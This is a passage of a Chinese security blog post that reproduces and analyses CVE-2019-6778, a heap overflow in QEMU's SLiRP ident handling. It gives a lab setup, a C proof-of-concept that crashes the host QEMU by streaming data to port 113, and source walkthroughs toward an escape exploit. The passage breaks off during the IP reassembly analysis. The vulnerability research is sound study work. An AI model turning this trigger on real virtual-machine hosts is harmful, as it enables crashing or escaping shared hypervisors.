CVE-2019-6778-Qemu逃逸漏洞复现与分析

2021-10-24

字数统计: 14.6k字 | 阅读时长≈ 78分

前几天把qemu逃逸相关的题目做了一些，算是初步入门了。最近会调试几个真实的qemu逃逸的漏洞，希望能借此了解qemu漏洞真实攻击面以及利用思路

漏洞描述

qemu-kvm默认使用的是-net nic -net user的参数，提供了一种用户模式(user-mode)的网络模拟。使用用户模式的网络的客户机可以连通宿主机及外部的网络。用户模式网络是完全由QEMU自身实现的，不依赖于其他的工具(bridge-utils、dnsmasq、iptables等)，而且不需要root用户权限。QEMU使用Slirp实现了一整套TCP/IP协议栈，并且使用这个协议栈实现了一套虚拟的NAT网络。SLiRP模块模拟了从链路层到应用层的多种网络协议，其中包括ARP协议、IP协议(v4和v6)、TCP/UDP协议、DHCP协议等。

cve-2019-6778这个漏洞存在于QEMU的网络模块SLiRP中，该模块中的tcp_emu()函数对端口113(Identification protocol)的数据进行处理时，没有进行有效的数据验证，导致堆溢出。经过构造，可以实现以QEMU进程权限执行任意代码。

环境搭建

编译qemu

漏洞版本是3.1.50，但是从qemu项目中没有找到这个版本，所以往前找一个版本，最终找到3.1.0，然后使用如下命令编译qemu:

# Fetch the QEMU sources and switch to the v3.1.0 release tag.
git clone git://git.qemu-project.org/qemu.git
cd qemu
git checkout tags/v3.1.0
# Build out of tree in bin/debug/naive.
mkdir -p bin/debug/naive
cd bin/debug/naive
# Only the x86_64 system emulator is built; --enable-debug keeps debug symbols.
../../../configure --target-list=x86_64-softmmu --enable-debug --disable-werror
make

编译出来qemu的路径为./qemu/bin/debug/naive/x86_64-softmmu/qemu-system-x86_64。

这里configure的命令--enable-debug将会保留调试符号，更利于调试。

编译文件系统

然后需要编译一个比较完整的文件系统，用以前做内核题时提供的文件系统很多命令都不全，所以这里还是建议自己编译一个更完整的。这里直接参考之前2020-geekpwn提供的文件，制作一个文件系统：

需要先安装debootstrap：

sudo apt-get install debootstrap

随后直接使用如下脚本制作文件系统：

# Build a Debian "stretch" root filesystem in ./qemu and pack it into qemu.img.
mkdir qemu

sudo debootstrap --include=openssh-server,curl,tar,gcc,\
libc6-dev,time,strace,sudo,less,psmisc,\
selinux-utils,policycoreutils,checkpolicy,selinux-policy-default \
stretch qemu

# From here on: abort on errors/unset variables and echo every command.
set -eux

# Set some defaults and enable promptless ssh to the machine for root.
sudo sed -i '/^root/ { s/:x:/::/ }' qemu/etc/passwd
echo 'T0:23:respawn:/sbin/getty -L ttyS0 115200 vt100' | sudo tee -a qemu/etc/inittab
#printf '\nauto enp0s3\niface enp0s3 inet dhcp\n' | sudo tee -a qemu/etc/network/interfaces
printf '\nallow-hotplug enp0s3\niface enp0s3 inet dhcp\n' | sudo tee -a qemu/etc/network/interfaces
echo 'debugfs /sys/kernel/debug debugfs defaults 0 0' | sudo tee -a qemu/etc/fstab
echo "kernel.printk = 7 4 1 3" | sudo tee -a qemu/etc/sysctl.conf
echo 'debug.exception-trace = 0' | sudo tee -a qemu/etc/sysctl.conf
echo "net.core.bpf_jit_enable = 1" | sudo tee -a qemu/etc/sysctl.conf
echo "net.core.bpf_jit_harden = 2" | sudo tee -a qemu/etc/sysctl.conf
echo "net.ipv4.ping_group_range = 0 65535" | sudo tee -a qemu/etc/sysctl.conf
echo -en "127.0.0.1\tlocalhost\n" | sudo tee qemu/etc/hosts
# The resolver configuration file is /etc/resolv.conf (not "resolve.conf").
echo "nameserver 8.8.8.8" | sudo tee -a qemu/etc/resolv.conf
echo "ubuntu" | sudo tee qemu/etc/hostname
sudo mkdir -p qemu/root/.ssh/
# Generate a fresh passphrase-less key pair and authorise it for root.
rm -rf ssh
mkdir -p ssh
ssh-keygen -f ssh/id_rsa -t rsa -N ''
cat ssh/id_rsa.pub | sudo tee qemu/root/.ssh/authorized_keys

# Build a disk image
# (sparse 2 GiB file: one 1 MiB block written at offset 2047 MiB)
dd if=/dev/zero of=qemu.img bs=1M seek=2047 count=1
sudo mkfs.ext4 -F qemu.img
sudo mkdir -p /mnt/qemu
sudo mount -o loop qemu.img /mnt/qemu
sudo cp -a qemu/. /mnt/qemu/.
# Unmount the same mount point that was mounted above.
sudo umount /mnt/qemu

内核文件

内核文件的编译，可以查看我之前写的关于内核pwn的相关文章，有提到如何编译内核。

启动环境

最后使用如下命令来启动qemu环境：

#!/bin/bash

# Boot ./bzImage with qemu.img as the root disk (/dev/sda) on a serial console.
# "-net user ... -net nic" selects the user-mode network backend; hostfwd
# forwards host TCP port 2222 to guest port 22.
sudo ./qemu-system-x86_64 \
	-kernel ./bzImage \
	-append "console=ttyS0 root=/dev/sda rw" \
	-hda ./qemu.img \
	-enable-kvm -m 2G -nographic \
	-net user,hostfwd=tcp::2222-:22 -net nic

启动后，qemu虚拟机ip=10.0.2.15，宿主机ip=10.0.2.2。

漏洞分析

这里先用poc文件，来从崩溃点往回溯找到漏洞点：

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>

/*
 * PoC: connect to TCP port 113 on the host address and keep streaming 'A'
 * bytes. The payload never contains '\r' or '\n'.
 *
 * Returns 0 once the stream can no longer be written, 1 if the socket
 * could not be created or connected.
 */
int main() {
    int s;
    struct sockaddr_in ip_addr;
    char buf[0x500];

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket");
        return 1;
    }

    /* Zero the whole address first so no field is left uninitialized. */
    memset(&ip_addr, 0, sizeof(ip_addr));
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr("10.0.2.2"); // host IP
    ip_addr.sin_port = htons(113);                   // vulnerable port
    if (connect(s, (struct sockaddr *)&ip_addr, sizeof(struct sockaddr_in)) < 0) {
        perror("connect");
        close(s);
        return 1;
    }

    memset(buf, 'A', sizeof(buf));
    /* Keep sending; stop instead of spinning once write() fails. */
    for (;;) {
        if (write(s, buf, sizeof(buf)) <= 0) {
            break;
        }
    }
    close(s);
    return 0;
}

解释一下这个poc文件，socket连接宿主机，并不断调用write发送数据，直到发生堆溢出为止，qemu崩溃。

使用gdb attach上程序后，在tcp_emu崩溃后，使用bt查看程序调用栈如下：

gdb-peda$ bt
#0  phys_page_find (d=0x7f559c1fc4c0, addr=0x1f7) at /home/alex/qemu/cve-2019-6788/qemu/
exec.c:375
#1  0x000055f914aea262 in address_space_lookup_region (d=0x7f559c1fc4c0, addr=0x1f7, res
olve_subpage=0x1) at /home/alex/qemu/cve-2019-6788/qemu/exec.c:395
#2  0x000055f914aea307 in address_space_translate_internal (d=0x7f559c1fc4c0, addr=0x1f7
, xlat=0x7f55a68c9908, plen=0x7f55a68c9900, resolve_subpage=0x1) at /home/alex/qemu/cve-
2019-6788/qemu/exec.c:414
#3  0x000055f914aea719 in flatview_do_translate (fv=0x7f559c20c070, addr=0x1f7, xlat=0x7
f55a68c9908, plen_out=0x7f55a68c9900, page_mask_out=0x0, is_write=0x0, is_mmio=0x1, targ
et_as=0x7f55a68c9868, attrs=...) at /home/alex/qemu/cve-2019-6788/qemu/exec.c:552
#4  0x000055f914aea9dc in flatview_translate (fv=0x7f559c20c070, addr=0x1f7, xlat=0x7f55
a68c9908, plen=0x7f55a68c9900, is_write=0x0, attrs=...) at /home/alex/qemu/cve-2019-6788
/qemu/exec.c:618
#5  0x000055f914af09f7 in flatview_read (fv=0x7f559c20c070, addr=0x1f7, attrs=..., buf=0
x7f55a829c000 "", len=0x1) at /home/alex/qemu/cve-2019-6788/qemu/exec.c:3331
#6  0x000055f914af0a9a in address_space_read_full (as=0x55f9158449c0 <address_space_io>,
 addr=0x1f7, attrs=..., buf=0x7f55a829c000 "", len=0x1) at /home/alex/qemu/cve-2019-6788
/qemu/exec.c:3345
#7  0x000055f914af0b79 in address_space_rw (as=0x55f9158449c0 <address_space_io>, addr=0
x1f7, attrs=..., buf=0x7f55a829c000 "", len=0x1, is_write=0x0) at /home/alex/qemu/cve-20
19-6788/qemu/exec.c:3375
#8  0x000055f914b734e1 in kvm_handle_io (port=0x1f7, attrs=..., data=0x7f55a829c000, dir
ection=0x0, size=0x1, count=0x1) at /home/alex/qemu/cve-2019-6788/qemu/accel/kvm/kvm-all
.c:1775
#9  0x000055f914b73c91 in kvm_cpu_exec (cpu=0x55f915c08600) at /home/alex/qemu/cve-2019-
6788/qemu/accel/kvm/kvm-all.c:2021
#10 0x000055f914b38d83 in qemu_kvm_cpu_thread_fn (arg=0x55f915c08600) at /home/alex/qemu
/cve-2019-6788/qemu/cpus.c:1281
#11 0x000055f9150a25b6 in qemu_thread_start (args=0x55f915c2ad90) at /home/alex/qemu/cve
-2019-6788/qemu/util/qemu-thread-posix.c:498
#12 0x00007f55a7e39609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#13 0x00007f55a7d5e293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

这里和其他师傅的调试时的结果不同，我这里的崩溃栈并不会直接在tcp_emu函数中发生。原因我猜测是可能我用的系统版本是20.10，环境变化导致。

所以这里想通过崩溃反推回漏洞点，还比较困难 : (

这里接着还是结合源码来分析吧。

源码首先分析slirp/tcp_subr.c中的tcp_emu函数：

int tcp_emu(struct socket *so, struct mbuf *m)
{
	Slirp *slirp = so->slirp;
	u_int n1, n2, n3, n4, n5, n6;
        char buff[257];
	uint32_t laddr;
	u_int lport;
	char *bptr;

	DEBUG_CALL("tcp_emu");
	DEBUG_ARG("so = %p", so);
	DEBUG_ARG("m = %p", m);

	switch(so->so_emu) {
		int x, i;

	 case EMU_IDENT:
		/*
		 * Identification protocol as per rfc-1413
		 */

		{
			struct socket *tmpso;
			struct sockaddr_in addr;
			socklen_t addrlen = sizeof(struct sockaddr_in);
			struct sbuf *so_rcv = &so->so_rcv;

			memcpy(so_rcv->sb_wptr, m->m_data, m->m_len);					//[1]
			so_rcv->sb_wptr += m->m_len;													//[2]
			so_rcv->sb_rptr += m->m_len;
			m->m_data[m->m_len] = 0; /* NULL terminate */			
			if (strchr(m->m_data, '\r') || strchr(m->m_data, '\n')) {		//[3]
				if (sscanf(so_rcv->sb_data, "%u%*[ ,]%u", &n1, &n2) == 2) {
					HTONS(n1);
					HTONS(n2);
					/* n2 is the one on our host */
					for (tmpso = slirp->tcb.so_next;
					     tmpso != &slirp->tcb;
					     tmpso = tmpso->so_next) {
						if (tmpso->so_laddr.s_addr == so->so_laddr.s_addr &&
						    tmpso->so_lport == n2 &&
						    tmpso->so_faddr.s_addr == so->so_faddr.s_addr &&
						    tmpso->so_fport == n1) {
							if (getsockname(tmpso->s,
								(struct sockaddr *)&addr, &addrlen) == 0)
							   n2 = ntohs(addr.sin_port);
							break;
						}
					}
				}
        so_rcv->sb_cc = snprintf(so_rcv->sb_data,so_rcv->sb_datalen,"%d,%d\r\n", n1, n2); //[4]
				so_rcv->sb_rptr = so_rcv->sb_data;
				so_rcv->sb_wptr = so_rcv->sb_data + so_rcv->sb_cc;		//[5]
			}
			m_free(m);
			return 0;
		}

函数的参数so为当前连接的socket对象，m为当前的消息包传输层的消息结构体，分别如下：

struct socket {
  struct socket *so_next,*so_prev;      /* For a linked list of sockets */

  int s;                           /* The actual socket */

  int pollfds_idx;                 /* GPollFD GArray index */

  Slirp *slirp;			   /* managing slirp instance */

			/* XXX union these with not-yet-used sbuf params */
  struct mbuf *so_m;	           /* Pointer to the original SYN packet,
				    * for non-blocking connect()'s, and
				    * PING reply's */
  struct tcpiphdr *so_ti;	   /* Pointer to the original ti within

  ...

  uint8_t	so_emu;		/* Is the socket emulated? */

  uint8_t       so_type;        /* Type of socket, UDP or TCP */
  int32_t       so_state;       /* internal state flags SS_*, below */

  struct 	tcpcb *so_tcpcb;	/* pointer to TCP protocol control block */
  u_int	so_expire;		/* When the socket will expire */

  int	so_queued;		/* Number of packets queued from this socket */
  int	so_nqueued;		/* Number of packets queued in a row
				 * Used to determine when to "downgrade" a session
					 * from fastq to batchq */

  struct sbuf so_rcv;		/* Receive buffer */
  struct sbuf so_snd;		/* Send buffer */
  void * extra;			/* Extra pointer */
};


/*
 * Message buffer: a fixed header followed by an inline data area (m_dat).
 * m_data/m_len describe the bytes currently held; m_ext is a separate
 * pointer field next to the inline area.
 */
struct mbuf {
	/* XXX should union some of these! */
	/* header at beginning of each mbuf: */
	struct	mbuf *m_next;		/* Linked list of mbufs */
	struct	mbuf *m_prev;
	struct	mbuf *m_nextpkt;	/* Next packet in queue/record */
	struct	mbuf *m_prevpkt;	/* Flags aren't used in the output queue */
	int	m_flags;		/* Misc flags */

	int	m_size;			/* Size of mbuf, from m_dat or m_ext */
	struct	socket *m_so;

	caddr_t	m_data;			/* Current location of data */
	int	m_len;			/* Amount of data in this mbuf, from m_data */

	Slirp *slirp;
	bool	resolution_requested;
	uint64_t expiration_date;
	char   *m_ext;
	/* start of dynamic buffer area, must be last element */
	char    m_dat[];
};

当socket数据包类型为EMU_IDENT时，程序会在[1]处先将m->m_data中的数据拷贝至so_rcv->sb_wptr。so_rcv的定义为struct sbuf。mbuf用来保存IP（网络层）数据包的数据，sbuf结构体则保存TCP（传输层）socket缓冲区中的数据，定义如下：

其中重点关注sb_cc参数，该参数用于记录sb_data中已有数据的长度。

/*
 * Socket data buffer: sb_data is the storage of sb_datalen bytes, sb_cc
 * counts the characters currently in it, and sb_wptr/sb_rptr are the
 * write and read cursors.
 */
struct sbuf {
	uint32_t sb_cc;		/* actual chars in buffer */
	uint32_t sb_datalen;	/* Length of data  */
	char	*sb_wptr;	/* write pointer. points to where the next
				 * bytes should be written in the sbuf */
	char	*sb_rptr;	/* read pointer. points to where the next
				 * byte should be read from the sbuf */
	char	*sb_data;	/* Actual data */
};

程序将m->m_data中的数据拷贝至so_rcv->sb_wptr后，会在[2]处更新当前sbuf的读写指针，以便后续接着写入。随后在[3]处会判断输入的消息字符串中是否含有\r或\n，如果有的话会进入[4]处。在[4]处，会使用snprintf将应答字符串写入sb_data，并把其返回的字符串长度赋给sb_cc，以此来更新sb_cc。最后就会进入[5]处，在此处会将写入指针重置为sb_data + sb_cc。

但是，如果没有\r或\n，那么则不会执行[4]和[5]，而是直接进入返回状态，也就是说sb_cc没有被更新，sb_wptr也不会被重置，仍然停留在[2]处前移之后的位置。

函数最后会释放m的堆块，并返回0。

那么接着，我们查看tcp_emu函数的交叉引用，在tcp_input函数中，发现了相关调用。

代码在slirp/tcp_input.c中:

/* Free space left in an sbuf: its capacity (sb_datalen) minus the bytes counted in sb_cc. */
#define sbspace(sb) ((sb)->sb_datalen - (sb)->sb_cc)

else if (ti->ti_ack == tp->snd_una &&
		    tcpfrag_list_empty(tp) &&
		    ti->ti_len <= sbspace(&so->so_rcv)) {			//范围检测，防止溢出
			/*
			 * this is a pure, in-sequence data packet
			 * with nothing on the reassembly queue and
			 * we have enough buffer space to take it.
			 */
			tp->rcv_nxt += ti->ti_len;
			/*
			 * Add data to socket buffer.
			 */
			if (so->so_emu) {
				if (tcp_emu(so,m)) sbappend(so, m);		//调用tcp_emu拷贝数据
			} else
				sbappend(so, m);

			/*
			 * If this is a short packet, then ACK now - with Nagel
			 *	congestion avoidance sender won't send more until
			 *	he gets an ACK.
			 *
			 * It is better to not delay acks at all to maximize
			 * TCP throughput.  See RFC 2581.
			 */
			tp->t_flags |= TF_ACKNOW;
			tcp_output(tp);
			return;
		}

这里首先可以看到使用了sbspace来检测so->so_rcv是否溢出，检查的方法是检查sb_datalen - sb_cc是否大于等于ti->ti_len。在上面提到sb_datalen表示当前消息缓冲区的总大小，sb_cc表示实际写入的字符串大小。ti结构体如下所示：

/*
 * Tcp+ip header, after ip options removed.
 * The union holds either the IPv4 or the IPv6 address/protocol fields;
 * ti_len and the TCP header follow it.
 */
struct tcpiphdr {
    struct mbuf_ptr ih_mbuf;	/* backpointer to mbuf */
    union {
        struct {
            struct  in_addr ih_src; /* source internet address */
            struct  in_addr ih_dst; /* destination internet address */
            uint8_t ih_x1;          /* (unused) */
            uint8_t ih_pr;          /* protocol */
        } ti_i4;                    /* IPv4 variant */
        struct {
            struct  in6_addr ih_src;
            struct  in6_addr ih_dst;
            uint8_t ih_x1;
            uint8_t ih_nh;
        } ti_i6;                    /* IPv6 variant */
    } ti;
    uint16_t    ti_x0;
    uint16_t    ti_len;             /* protocol length */
    struct      tcphdr ti_t;        /* tcp header */
};

ti->ti_len表示协议长度，那么这里的长度检查就是判断so_rcv的剩余空间是否大于等于协议长度，如果满足则进入下一步。

随后会判断so->so_emu是否赋值，如果赋值，则执行tcp_emu。我们前面已经说明了tcp_emu此时会返回0，也就是最后并不会执行sbappend(so, m)函数。

漏洞点总结

上面对tcp_emu和tcp_input函数都有了说明，这里总结一下漏洞原因。

1、首先进入tcp_input函数，会先调用sbspace来检查缓冲区是否溢出，根据(sb)->sb_datalen - (sb)->sb_cc计算剩余缓冲区长度；

2、随后设置了so->so_emu后，会进入tcp_emu函数；

3、如果so->so_emu等于EMU_IDENT时，会调用memcpy(so_rcv->sb_wptr, m->m_data, m->m_len);将mbuf中的数据拷贝到socket的接收缓冲区sbuf中;

4、随后会更新so_rcv->sb_wptr += m->m_len;;

5、如果m_data中不包含\r和\n时，则不会进入so_rcv->sb_cc = snprintf(so_rcv->sb_data,so_rcv->sb_datalen,"%d,%d\r\n", n1, n2);，那么sb_cc就永远为0，并且sb_wptr仍然为4中的值；

6、随后tcp_emu函数返回，继续进入下一次写；

7、第二次写时，又进入tcp_input，由于sb_cc=0，所以sbspace缓冲区检查将会顺利通过；

8、再次进入tcp_emu函数，继续执行memcpy，此时sb_wptr已经加上了第一次写入的长度，那么就会继续对缓冲区增加写入m_len长度的数据;

9、如果m_data仍然不包含\r和\n时，则sb_cc仍然等于0。

10、最后程序循环执行从7到9的步骤，在第8步中 memcpy导致了堆溢出。

漏洞触发

结合最开始提供的poc，说明一下如何触发该漏洞：

首先要想进入tcp_input的漏洞部分，需要保证ti->ti_len不为0，这个只要保证设置了地址协议族为AF_INET即可。

随后要想进入tcp_emu协议部分，需要保证so->so_emu为EMU_IDENT标识位。经过分析这需要保证tcp协议为标识协议Identification Protocol，该协议的简介如下：

“Identification Protocol（标识协议）”在 RFC 1413 中描述。实际上每个类 Unix 操作系统都带着一个默认监听 TCP 113 端口的 ident 服务器

所以，这里我们需要保证目标端口是113，然后该TCP协议就会自动被标识为EMU_IDENT。

漏洞利用

前面已经提到我们拥有一个堆溢出漏洞。一个堆溢出漏洞的利用，我想到的主要利用思路有两种：

1、在后面布置含有函数指针的堆块，通过堆溢出修改目标函数指针，达到劫持控制流的思路；

2、在后面布置含有读写指针的堆块，通过修改读写指针来实现任意地址写，然后在去劫持控制流。

但是，要想顺利的将一个目标堆块布置在我们的漏洞堆块后，需要实现一个堆风水布局，这里理想的方法是通过top chunk来分配这两个堆块，那么即能稳定实现两个堆块的先后顺序。但是为了实现从top chunk分配，我们首先需要拥有一个malloc原语来消耗多余的堆块。

malloc原语

这里和之前分析vmware dhcp逃逸时类似，都是需要去查看tcp\ip的其他功能中是否能够找到一个可控的malloc原语。首先复习一下IP协议：

Zero:Unused，置为0
Do not fragment flag:表示数据包是否为分片数据包，当置为1时，表示未分片，简写为DF位
More fragments following flag:表示后续是否还有分片，有的话置为1，简写为MF位
Fragment Offset：当前数据包在整个大数据包中的偏移offset。

IP包的total_length用2字节表示，因此一个IP数据包最大为65535字节，一旦要发送大量数据时我们需要对数据包进行分段传输，IP协议各字段如下所示。

接着，分析一下qemu中对于IP协议的处理，首先查看一下IP结构体，每个字段都能与上图中的IP图对照起来：

/*
 * Structure of an internet header, naked of options.
 * ip_off carries the IP_DF/IP_MF flag bits together with the fragment
 * offset (low 13 bits, IP_OFFMASK).
 */
struct ip {
#ifdef HOST_WORDS_BIGENDIAN
	uint8_t ip_v:4,			/* version */
		ip_hl:4;		/* header length */
#else
	uint8_t ip_hl:4,		/* header length */
		ip_v:4;			/* version */
#endif
	uint8_t		ip_tos;			/* type of service */
	uint16_t	ip_len;			/* total length */
	uint16_t	ip_id;			/* identification */
	uint16_t	ip_off;			/* fragment offset field */
#define	IP_DF 0x4000			/* don't fragment flag */
#define	IP_MF 0x2000			/* more fragments flag */
#define	IP_OFFMASK 0x1fff		/* mask for fragmenting bits */
	uint8_t ip_ttl;			/* time to live */
	uint8_t ip_p;			/* protocol */
	uint16_t	ip_sum;			/* checksum */
	struct	in_addr ip_src,ip_dst;	/* source and dest address */
} QEMU_PACKED;

随后，我们主要关注slirp/ip_input.c中的ip_input函数：

/*
 * Ip input routine.  Checksum and byte swap header.  If fragmented
 * try to reassemble.  Process options.  Pass to next level.
 *
 * Every rejected packet ends at the "bad" label, which frees m.
 */
void ip_input(struct mbuf *m)
{
	Slirp *slirp = m->slirp;
	register struct ip *ip;
	int hlen;

	if (!slirp->in_enabled) {
		goto bad;
	}

	DEBUG_CALL("ip_input");
	DEBUG_ARG("m = %p", m);
	DEBUG_ARG("m_len = %d", m->m_len);

	if (m->m_len < sizeof (struct ip)) {		//drop if shorter than a minimal IP header
		goto bad;
	}

	ip = mtod(m, struct ip *);

	if (ip->ip_v != IPVERSION) {	//check the IP version
		goto bad;
	}

	hlen = ip->ip_hl << 2;
	if (hlen<sizeof(struct ip ) || hlen>m->m_len) {/* min header length */
	  goto bad;                                  /* or packet too short */
	}

        /* keep ip header intact for ICMP reply
	 * ip->ip_sum = cksum(m, hlen);
	 * if (ip->ip_sum) {
	 */
	if(cksum(m,hlen)) {		//header checksum must verify
	  goto bad;
	}

	/*
	 * Convert fields to host representation.
	 */
	NTOHS(ip->ip_len);
	if (ip->ip_len < hlen) {		//total length must cover the header
		goto bad;
	}
	NTOHS(ip->ip_id);
	NTOHS(ip->ip_off);

	/*
	 * Check that the amount of data in the buffers
	 * is as at least much as the IP header would have us expect.
	 * Trim mbufs if longer than we expect.
	 * Drop packet if shorter than we expect.
	 */
	if (m->m_len < ip->ip_len) {	//drop if the mbuf holds fewer than ip_len bytes
		goto bad;
	}

	/* Should drop packet if mbuf too long? hmmm... */
	if (m->m_len > ip->ip_len)		//trim the mbuf if it holds more than ip_len bytes
	   m_adj(m, ip->ip_len - m->m_len);

	/* check ip_ttl for a correct ICMP reply */
	if (ip->ip_ttl == 0) {			//TTL of 0: send an ICMP time-exceeded error and drop
	    icmp_send_error(m, ICMP_TIMXCEED, ICMP_TIMXCEED_INTRANS, 0, "ttl");
	    goto bad;
	}

  // [1] everything above validates the IP header fields
	/*
	 * If offset or IP_MF are set, must reassemble.
	 * Otherwise, nothing need be done.
	 * (We could look in the reassembly queue to see
	 * if the packet was previously fragmented,
	 * but it's not worth the time; just let them time out.)
	 *
	 * XXX This should fail, don't fragment yet
	 */
	if (ip->ip_off &~ IP_DF) {	//MF flag or a non-zero fragment offset is set
	  register struct ipq *fp;
      struct qlink *l;
		/*
		 * Look for queue of fragments
		 * of this datagram.
		 */
		for (l = slirp->ipq.ip_link.next; l != &slirp->ipq.ip_link;
		     l = l->next) {
            fp = container_of(l, struct ipq, ip_link);	// match on id, source, destination and protocol
            if (ip->ip_id == fp->ipq_id &&
                    ip->ip_src.s_addr == fp->ipq_src.s_addr &&
                    ip->ip_dst.s_addr == fp->ipq_dst.s_addr &&
                    ip->ip_p == fp->ipq_p)
		    goto found;
        }
        fp = NULL;
	found:

		/*
		 * Adjust ip_len to not reflect header,
		 * set ip_mff if more fragments are expected,
		 * convert offset of this to bytes.
		 */
		ip->ip_len -= hlen;       
		if (ip->ip_off & IP_MF)     // remember the MF flag in the low bit of ip_tos
		  ip->ip_tos |= 1;
		else
		  ip->ip_tos &= ~1;

		ip->ip_off <<= 3;     //convert the fragment offset to bytes

		/*
		 * If datagram marked as having more fragments
		 * or if this is not the first fragment,
		 * attempt reassembly; if it succeeds, proceed.
		 */
		if (ip->ip_tos & 1 || ip->ip_off) {    // fragment: attempt reassembly
			ip = ip_reass(slirp, ip, fp);
      if (ip == NULL)
				return;
			m = dtom(slirp, ip);
		} else
			if (fp)										//not a fragment: free the queue found above, if any
		   	   ip_freef(slirp, fp);

	} else
		ip->ip_len -= hlen;				//ip_len no longer includes the header

  
  //[2] IP fragment handling
  
	/*
	 * Switch out to protocol's input routine.
	 */
	switch (ip->ip_p) {	// [3] dispatch on the protocol field
	 case IPPROTO_TCP:
		tcp_input(m, hlen, (struct socket *)NULL, AF_INET);
		break;
	 case IPPROTO_UDP:
		udp_input(m, hlen);
		break;
	 case IPPROTO_ICMP:
		icmp_input(m, hlen);
		break;
	 default:
		m_free(m);
	}
	return;
bad:
	m_free(m);
}

对上面的代码，做一个简单的分析：

1、在[1]处之前，都是对IP各标志位的检查，包括：对IP版本、数据包长度、消息长度、校验值和TTL的检查；

2、在[1]与[2]之间，对IP分片包进行处理，首先会从分片包队列中查找该报文是否属于已有的IP分包序列，随后如果该报文设置了MF标志或分片偏移不为0，则进入包重组阶段；

3、在包重组阶段中，会首先调用ip_reass进行包重组

4、如果该报文既没有设置MF标志、分片偏移也为0（即不是分片包），则在找到同标识的重组队列时调用ip_freef将其释放，然后直接进行后续传输层协议处理的部分

我们接着看一下ip_reass是如何重组分包序列的：

/*
 * Take incoming datagram fragment and try to
 * reassemble it into whole datagram.  If a chain for
 * reassembly of this datagram already exists, then it
 * is given as fp; otherwise have to make a chain.
 *
 * Returns the header of the reassembled datagram, or NULL when the
 * datagram is still incomplete or the fragment was dropped.
 */
static struct ip *
ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp)
{
	register struct mbuf *m = dtom(slirp, ip);
	register struct ipasfrag *q;
	int hlen = ip->ip_hl << 2;
	int i, next;

	DEBUG_CALL("ip_reass");
	DEBUG_ARG("ip = %p", ip);
	DEBUG_ARG("fp = %p", fp);
	DEBUG_ARG("m = %p", m);

	/*
	 * Presence of header sizes in mbufs
	 * would confuse code below.
         * Fragment m_data is concatenated.
	 */
	m->m_data += hlen;		// skip past the IP header						[1]
	m->m_len -= hlen;			// and shrink the data length to match

	/*
	 * If first fragment to arrive, create a reassembly queue.
	 */
  if (fp == NULL) {				//no queue for this datagram yet: create one		[2]
	  		struct mbuf *t = m_get(slirp);

	  if (t == NULL) {				//no mbuf available: drop this fragment
	      goto dropfrag;
	  }
	  fp = mtod(t, struct ipq *);					//use the new mbuf's data area as the struct ipq
	  insque(&fp->ip_link, &slirp->ipq.ip_link);
	  fp->ipq_ttl = IPFRAGTTL;			//initialise the queue header
	  fp->ipq_p = ip->ip_p;
	  fp->ipq_id = ip->ip_id;
	  fp->frag_link.next = fp->frag_link.prev = &fp->frag_link;
	  fp->ipq_src = ip->ip_src;
	  fp->ipq_dst = ip->ip_dst;
	  q = (struct ipasfrag *)fp;
	  goto insert;								//go straight to insertion
	}	

	/*
	 * Find a segment which begins after this one does.
	 */
	for (q = fp->frag_link.next; q != (struct ipasfrag *)&fp->frag_link;
            q = q->ipf_next)
		if (q->ipf_off > ip->ip_off)		//first queued fragment that starts after ours
			break;

	/*
	 * If there is a preceding segment, it may provide some of
	 * our data already.  If so, drop the data from the incoming
	 * segment.  If it provides all of our data, drop us.
	 */
  //trim (or drop) data already covered by the preceding fragment
	if (q->ipf_prev != &fp->frag_link) {
    struct ipasfrag *pq = q->ipf_prev;
		i = pq->ipf_off + pq->ipf_len - ip->ip_off;
		if (i > 0) {
			if (i >= ip->ip_len)
				goto dropfrag;
			m_adj(dtom(slirp, ip), i);
			ip->ip_off += i;
			ip->ip_len -= i;
		}
	}

	/*
	 * While we overlap succeeding segments trim them or,
	 * if they are completely covered, dequeue them.
	 */
  //trim or dequeue the following fragments that we overlap
	while (q != (struct ipasfrag*)&fp->frag_link &&
            ip->ip_off + ip->ip_len > q->ipf_off) {
		i = (ip->ip_off + ip->ip_len) - q->ipf_off;
		if (i < q->ipf_len) {
			q->ipf_len -= i;
			q->ipf_off += i;
			m_adj(dtom(slirp, q), i);
			break;
		}
		q = q->ipf_next;
		m_free(dtom(slirp, q->ipf_prev));
		ip_deq(q->ipf_prev);
	}

insert:		//insert the fragment
	/*
	 * Stick new segment in its place;
	 * check for complete reassembly.
	 */
  //link the fragment into the list
	ip_enq(iptofrag(ip), q->ipf_prev);
	next = 0;
	for (q = fp->frag_link.next; q != (struct ipasfrag*)&fp->frag_link;
            q = q->ipf_next) {
		if (q->ipf_off != next)
            return NULL;
		next += q->ipf_len;		//offset the next fragment must start at
	}
	if (((struct ipasfrag *)(q->ipf_prev))->ipf_tos & 1)
                return NULL;

	/*
	 * Reassembly is complete; concatenate fragments.
	 */
  q = fp->frag_link.next;					//all fragments are present: merge them with m_cat
	m = dtom(slirp, q);							//mbuf of the first fragment in the list

	q = (struct ipasfrag *) q->ipf_next;
	while (q != (struct ipasfrag*)&fp->frag_link) {
	  struct mbuf *t = dtom(slirp, q);
	  q = (struct ipasfrag *) q->ipf_next;
	  m_cat(m, t);							//append this fragment's data to m
	}

	/*
	 * Create header for new ip packet by
	 * modifying header of first packet;
	 * dequeue and discard fragment reassembly header.
	 * Make header visible.
	 */
	q = fp->frag_link.next;

	/*
	 * If the fragments concatenated to an mbuf that's
	 * bigger than the total size of the fragment, then and
	 * m_ext buffer was alloced. But fp->ipq_next points to
	 * the old buffer (in the mbuf), so we must point ip
	 * into the new buffer.
	 */
	if (m->m_flags & M_EXT) {
	  int delta = (char *)q - m->m_dat;
	  q = (struct ipasfrag *)(m->m_ext + delta);
	}

  ip = fragtoip(q);
	ip->ip_len = next;
	ip->ip_tos &= ~1;
	ip->ip_src = fp->ipq_src;
	ip->ip_dst = fp->ipq_dst;
	remque(&fp->ip_link);
	(void) m_free(dtom(slirp, fp));
	m->m_len += (ip->ip_hl << 2);
	m->m_data -= (ip->ip_hl << 2);

	return ip;

dropfrag:
	m_free(m);
        return NULL;
}

IP重组流程如下：

